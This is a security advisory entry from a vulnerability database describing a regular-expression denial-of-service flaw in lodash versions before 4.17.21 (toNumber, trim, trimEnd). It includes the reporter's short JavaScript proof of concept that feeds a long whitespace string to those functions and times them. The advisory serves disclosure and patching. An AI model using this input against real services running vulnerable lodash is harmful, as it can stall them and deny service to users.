Lucene search

K
osvGoogleOSV:GHSA-29MW-WPGM-HMR9
HistoryJan 06, 2022 - 8:30 p.m.

Regular Expression Denial of Service (ReDoS) in lodash

2022-01-0620:30:46
Google
osv.dev
163
vulnerable package
regular expression denial of service
lodash
tonumber
trim
trimend

AI Score

6

Confidence

High

EPSS

0.002

Percentile

61.4%

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash');

function build_blank(n) {
    var ret = "1"
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s) 
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);

References

AI Score

6

Confidence

High

EPSS

0.002

Percentile

61.4%